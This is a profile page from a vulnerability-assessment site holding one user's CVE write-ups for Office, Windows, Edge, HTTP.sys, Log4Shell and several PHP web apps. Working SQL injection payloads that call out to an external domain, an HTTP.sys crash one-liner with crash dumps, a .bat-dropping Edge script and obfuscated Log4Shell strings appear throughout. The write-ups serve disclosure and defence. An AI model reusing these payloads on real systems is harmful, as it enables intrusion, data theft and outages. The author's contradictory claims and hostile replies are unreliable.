nu11secur1ty (162)

Last Login: May 17, 2022

Assessments

76

Score

162

8th Place

nu11secur1ty's Latest (20) Contributions

Sort by:

Filter by:

1

nu11secur1ty assessed CVE-2022-29110

May 17, 2022 11:52am UTC (3 days ago)•Edited 3 days ago

Ratings

Attacker Value

Very High

Exploitability

Medium

Unauthenticated Vulnerable in default configuration

Technical Analysis

CVE-2022-29110

Description:

The Microsoft 365 version 2204-Build-15128.20178 is vulnerable to RCE.
The malicious attacker can share a malicious .docm file in some of the internal or external networks by using an FTP malicious server and he can infect all computers in this network. The infected user can visit a very dangerous website and when he clicks it he can execute a bunch of javascript malicious codes or can execute a dangerous local code! Also, the malicious author can use a USB flash memory to infect every computer by using Microsoft 365 software.

Known Affected Software

Vendor 	Product 	Version
Microsoft 	Microsoft_Excel	2016 (32-bit edition)
Microsoft 	Microsoft_Excel	2016 (64-bit edition)
Microsoft 	Microsoft_Excel	2013 RT Service Pack 1
Microsoft 	Microsoft_Excel	2013 Service Pack 1 (32-bit editions)
Microsoft 	Microsoft_Excel	2013 Service Pack 1 (64-bit editions)
Microsoft 	Microsoft_Office_Web_Apps	Server 2013 Service Pack 1

Reproduce:

Proof and Exploit

1

nu11secur1ty assessed CVE-2021-43420

January 26, 2022 6:12pm UTC (3 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Unauthenticated Vulnerable in default configuration

Technical Analysis

CVE-NU11-2021-1101

Description:

The OPH – PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication and PHPSESSID Hijacking.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts.
Also, the attacker can use PHPSSESSID to steal the session to the admin account. Disaster, online payment system WTF.

Reproduce:

Proof

1

nu11secur1ty assessed CVE-2022-21906

January 26, 2022 1:28pm UTC (3 months ago)•Edited 3 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Unauthenticated Vulnerable in default configuration

Technical Analysis

CVE-2022-21906

Microsoft

Vendor

Description

Windows Defender Application Control Security Feature Bypass Vulnerability.
The attacker can execute extremely dangerous apps by using different scenarios,
directly from the user profile, without any reaction from the side of the Windows Defender.
Read more: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21906

The latest version of Windows 10 Pro, plus the latest update!

Reproduce:

Proof and Exploit

BugCheck after the exploit, the reaction of the kernel:

BSOD.exe

1: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied}  A process has requested access to an object, but has not been granted those access rights.

BUGCHECK_CODE:  c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

PROCESS_NAME:  BSOD.exe

SYMBOL_NAME:  nt!PopTransitionSystemPowerStateEx+1217

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

FAILURE_BUCKET_ID:  STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

FAILURE_ID_HASH:  {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup:     MachineOwner
---------

malicious.exe

0: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied}  A process has requested access to an object, but has not been granted those access rights.

BUGCHECK_CODE:  c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

PROCESS_NAME:  malicious.exe

SYMBOL_NAME:  nt!PopTransitionSystemPowerStateEx+1217

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

FAILURE_BUCKET_ID:  STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

FAILURE_ID_HASH:  {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup:     MachineOwner
---------

BR

.\nu11secur1ty

1

nu11secur1ty assessed CVE-2022-21970

January 18, 2022 8:41pm UTC (4 months ago)•Edited 4 months ago

Ratings

Attacker Value

Medium

Exploitability

Medium

Difficult to patch Gives privileged access Vulnerable in default configuration Difficult to weaponize

Technical Analysis

CVE-2022-21970

Description

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability.
This vulnerability allows an attacker to execute javascript code on every host without permission, also an attacker can steal local system files, and also he can manipulate the actions against the machine and result in changing internal developer settings in Microsoft Edge.

NOTE: In this example, Microsoft Edge executes a malicious script without problems.
This is just a malicious .bat file that reboots the infected machine, and it’s only for testing!
The attacker can create a malicious file that can take a privileges escalation, malware, spyware, or kernel exploit file and harm seriously your device!
Not correctly sanitizing and checking for that what users download on their machines by using a MsEdge!

NOTE after the exploit: A malicious user, or whatever user can execute directly malicious .bat files which are created – generated from this javascript exploit by using MsEdge. 😁
According to Edge, this file is safe to run and open. 😁

FAQ

What is the version information for this release?

Microsoft Edge Version Date Released Based on Chromium Version

97.0.1072.55 | 1/6/2022 | 97.0.4692.71

STATUS:

Patched and fixed on!

The next test is checking if this is fully patched! 🤫 😛 😎

Proof and simple browser test MsEdge: Edge is blocking `.sys` files because they can harm your device:

This proof of concept is shown as to how the MsEdge browser NOT blocking `.bat` files, and this is a problem.

NOTE: A malicious user, or whatever user can execute directly malicious .bat files which are created – generated by using exactly MsEdge and this javascript exploit.
This is ridiculous and incorrect sanitizing!😁
According to Edge, this file is safe to run and open. 😁
Screenshot, example:

In Action:

download the PoC
extracted somewhere
Execute

start msedge C:\Users\user2022\Desktop\ExploitServer\examples\exploit.html

Example from the function():

    $start.onclick = () => {
        const blob = new Blob(['shutdown /r'])
        const fileStream = streamSaver.createWriteStream('pwned.bat', {
          size: blob.size // Makes the percentage visiable in the download
        })

Reproduce:

Proof and Exploit:

BR nu11secur1ty

-2

nu11secur1ty replied to their assessment of CVE-2022-21907

January 14, 2022 11:55pm UTC (4 months ago)•Edited 2 months ago

Whatever. Obviously, you don’t understand.
Yesterday I found people which using exactly this version without any updates, for their special purpose. By the way, this version is NOT old :D Microsoft just doesn’t give a shit about their clients, they have a lot of money. This is so stupid to deprecate OS which is so young because you can not fix one stupid sanitizing error ok! So, please bro… Stop writing bullshits, and trying to explain to me things which you don’t understand! Bay the way, there is no issue and problems, which are described on CVE-2022-21907, and never has, this is a ridiculous experiment of Microsoft. ;) So. Love and peace!
BR =)

0

nu11secur1ty replied to their assessment of CVE-2022-21907

January 14, 2022 11:02am UTC (4 months ago)•Edited 4 months ago

Ooh, my friend good afternoon =) Obviously, you don’t understand that the problem is not fixed completely.
So, The versions 1908, server 1909, and 2019 versions are not vulnerable by default, they are already patched on the PROD iso
and the problem is fixed, but not yet :D. But if you decide to UPGRADE these products, from 1809 > 1909 to 2004: BOOM – congratulation :D Microsoft has changed the description of the problem, and that what is vulnerable, and what is not. Please read it again!!! We have opened a new case for this CVE + so the information is confidential, and I’m sorry that I can not share more details for the newly opened case!!! As I mentioned, we discovered the problem last year, and I’m glad that you find out about our discussion with 0verkl0k :D This is already reported, and we work on it with Microsoft. So. Do not play with my patience my friend, please!
KR

1

nu11secur1ty assessed CVE-2021-44655

January 14, 2022 7:49am UTC (4 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-44655

Software

Vendor

Description:

The bid, c & id parameters from /used_car_showroom/ node app on Online-Pre-owned/Used Car Showroom Management 1.0 system appear to be vulnerable to Multiple time-based blind SQL injection attacks. The payload ‘+(select load_file(’\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj’))+’ was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL

[+] Payloads:

Multiple: bit, c & id

---
Parameter: bid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---


---
Parameter: c (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---


---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---

Reproduce:

Proof and Exploit:

-2

nu11secur1ty assessed CVE-2022-21907

January 12, 2022 8:40pm UTC (4 months ago)•Edited 4 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Technical Analysis

CVE-2022-21907

MSRC

Description:

NOTE: After a couple of hours of tests and experiments, I found that there have been no vulnerabilities, this is just a ridiculous experiment of Microsoft. When I decided to install the IIS packages on these Windows platforms, everything was ok, and everything is patched! Windows Server 2019, Windows 10 version 1809 – 2018 year are not vulnerable by default, but after I decided to upgrade from 1909 to 2004. I found a serious problem! The Windows 10 version 2004 – 2020 year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack method: buffer overflow – deny of service and restart the system. This problem exists, from last year which is reported on CVE-2021-31166, and still there! On that days I have worked on it again with the help and collaboration of Axel Souchet 0vercl0k the author of the idea. On that day, I wrote an only one-line command to exploit this vulnerability!

Status: CRITICAL

NOTE:
The HTTP Trailer Support feature that contains the vulnerability is not active by default.
The following registry key must be configured to introduce the vulnerable condition:

Faq

How could an attacker exploit this vulnerability?
- In most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets.
Is this wormable?
- Yes. Microsoft recommends prioritizing the patching of affected servers.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\

"EnableTrailerSupport"=dword:00000001

This mitigation does not apply to the other affected versions.

Simple test connection before debugging:

 curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"

Output:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - File or directory not found.</h2>
  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
 </fieldset></div>
</div>
</body>
</html>

302

curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"

Output:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - File or directory not found.</h2>
  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
 </fieldset></div>
</div>
</body>
</html>

404

 curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"

Output:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - File or directory not found.</h2>
  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
 </fieldset></div>
</div>
</body>
</html>

Bugcheck:

1: kd> kp
Child-SP          RetAddr               Call Site
ffffa102`87993158 fffff806`50404929     nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50     nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3     nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537     nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5     HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191     HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368     HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47     HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f     HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a     HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852     HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715     HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078     nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000     nt!KiStartSystemThread+0x28
1: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure.  The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

*** WARNING: Unable to verify timestamp for win32k.sys

BUGCHECK_CODE:  139

BUGCHECK_P1: 3

BUGCHECK_P2: ffffa10287993480

BUGCHECK_P3: ffffa102879933d8

BUGCHECK_P4: 0

PROCESS_NAME:  System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

SYMBOL_NAME:  HTTP!UlFreeUnknownCodingList+63

MODULE_NAME: HTTP

IMAGE_NAME:  HTTP.sys

FAILURE_BUCKET_ID:  0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList

FAILURE_ID_HASH:  {1b194f54-2d0b-e3a8-62e2-afded08822bd}

Followup:     MachineOwner
---------

Exploit after bugcheck:

Aftershock:

Music:

Reproduce:

Proof and Exploit:

IMPORTANT!!!

Microsoft: They said: We don’t support anymore this Windows 10 version 2004!
Wooooow, this is so young version, and for one bug you will deprecate this distro!?
WTF :D

WARNING!!!

Dear users, you must fix your problem with this version 2004, alone!
So, follow the steps, I will help you if you need to use exactly this version of Windows 10 2004

CONCLUSION!

If you decide to UPGRADE from 1809 > 1909 to 2004, you MUST INSTALL all PATCHES for version 2004 to the LATEST from Microsoft!!!

After Update – RECOMMENDED:

1.

2.

3.

Done:

The problem with version 2004 is fixed, after installing all patches and updates!

Proof:

NOTE!!

In the world have hundreds of thousands of machines are using exactly this version and are still not `updated` for some reason or whatever!
You can imagine what is going on if some malicious user will detected them!

Latest information:

~~Please, stay informed of the case on:~~

~~https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907~~

m0r3:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907

KR @nu11secur1t

2

nu11secur1ty assessed CVE-2021-44228 (Log4Shell)

December 19, 2021 9:49am UTC (5 months ago)•Edited 4 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

Software

Explanation: log4j
Collaboration: burp-log4shell
- Thanks

More

CVE

Protect yourself, before you break yourself… ;)

Description:

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Usage and explanation:

Demonstration of scanning for Log4j vulnerability
- NOTE: For advanced users!
Manual installing the extension for BurpSuite

IMPORTANT:

Check in to BApp Store if all components are deployed!

>>> from log4shell_regexes import *

>>> t = lambda s: [k for k in test(s)]
>>> tt = lambda s: [(k, list(v.keys())) for k, v in test_thorough(s).items()]

>>> t('${ jndi\t: addr\n}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${ jndi\t: addr\n')
['SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}')
['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}')
['ANY_RE', 'ANY_INCL_ESCS_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D')
['NESTED_INCL_ESCS_RE', 'ANY_INCL_ESCS_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('$%7B\u006a\\156di:addr\\x7d')
['ANY_INCL_ESCS_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${jndi:dns://addr}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${${base64:am5kaTpsZGFwOi8vYWRkcgo=}}') # LOG4J2-2446
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://addr')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${${::-j}nd${upper:ı}:rm${upper:ı}://addr}')
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}')
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[]

>>> tt('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[
	(
		'\\u002524%7Bjnd%24%7Bupper%5Cu003a%5C%5C461%7D%3Aldap%3A\\0452F%2Faddr%7D',
		['NESTED_INCL_ESCS_RE', 'ANY_INCL_ESCS_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	), (
		'${jnd${upper\\u003a\\\\461}:ldap://addr}',
		['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	), (
		'${jnd${upper:\\461}:ldap://addr}',
		['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	), (
		'${jnd${upper:ı}:ldap://addr}',
		['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	)
]

Docker vulnerable app:

cd vuln_app/CVE-2021-44228-VULN-APP/
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc

Listening on port 8080

Support for vulnerable machine APP by

kozmer

Support for Burp module by

silentsignal

Demo, testing, and debugging by

nu11secur1ty

Video and reproduce of the vulnerability

NOTE: The test is outside of the credentials for login! ;)

More

Information

Scanner

1

nu11secur1ty assessed CVE-2021-40578

December 13, 2021 4:45pm UTC (5 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

Online-Enrollment-Management-System

Vendor

Description:

The id parameter from Online Enrollment Management System 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file(’\\5bhtyx01jb7u7d6h2uthd4khq8w1ktch3jrbe12q.nu11secur1typentestingengineer.net\ofp’)) was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve sensitive information for all users of this system.
STATUS: Critical and Awful.

Mysql Request:

POST /onlineenrolmentsystem/menu1.php HTTP/1.1
Host: 192.168.10.73
Origin: http://192.168.10.73
Cookie: PHPSESSID=5hjqmc8ms45586p1rqdv1ld9gd
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.73/onlineenrolmentsystem/index.php?q=department
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 5

id=(select%20load_file('%5c%5c%5c%5c5bhtyx01jb7u7d6h2uthd4khq8w1ktch3jrbe12q.nu11secur1typenetrationtestingengineer.net%5c%5cofp'))

MySQL Response:

HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 12:11:35 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 159
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Projects Row -->
<div class="row">
<div class="col-md-12">
<ul>


</ul>
</div>
</div>
<!-- /.row -->

Reproduce:

Proof and Exploit:

1

nu11secur1ty assessed CVE-2021-41646

December 08, 2021 10:37am UTC (5 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Unauthenticated Vulnerable in default configuration

Technical Analysis

CVE-2021-41646

Vendor

Description:

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.
The vulnerable directory can be used by the directory traversal method in the browser from the attacker to retrieve sensitive information or destroy the system by using an RCE method for this action!
Status: CRITICAL

Reproduce:

Proof and Exploit

1

nu11secur1ty assessed CVE-2021-42668

December 05, 2021 9:21am UTC (5 months ago)•Edited 5 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-42668

Vendor

Description

The id from my_classmates.php in Engineers Online Portal 1.0 parameter appears to be vulnerable to SQL injection and RCE attacks.
The payload ‘+(select load_file(’\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch’))+’ was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can bypass the admin account and he can upload a malicious code by using the avatar vulnerability function with directory traversal method,
then he can execute this malicious code. For this example, the attacker destroys all files in the current directory.
STATUS Hiper Critical and Awful.
CONCLUSION: This pseudo developer must be stopped immediately.

MySQL Request:

GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1
Host: 192.168.1.2
